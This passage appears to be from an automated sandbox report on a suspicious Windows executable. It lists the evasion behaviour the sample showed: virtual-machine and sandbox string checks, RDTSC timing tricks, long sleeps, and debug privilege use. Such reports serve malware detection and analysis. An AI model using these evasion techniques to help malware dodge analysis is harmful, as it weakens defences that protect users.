            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.686799799.0000000002604000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 3cGH9Bakuq.exe PID: 6452, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000CD8604 second address: 0000000000CD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000CD898E second address: 0000000000CD8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exe TID: 6960Thread sleep time: -30795s >= -30000s
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2092Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2820Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread delayed: delay time: 30795
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000007.00000000.690599352.0000000004710000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.714021097.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.732277196.000000000A897000.00000004.00000001.sdmpBinary or memory string: 806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.726137723.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.714021097.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.761358356.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000007.00000000.700488613.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000007.00000000.730817576.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F63884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F63884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F00050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F00050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F98DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F669A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F07D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F23D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F63540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F6A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F28EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F646A7 mov eax, dword ptr fs:[00000030h]
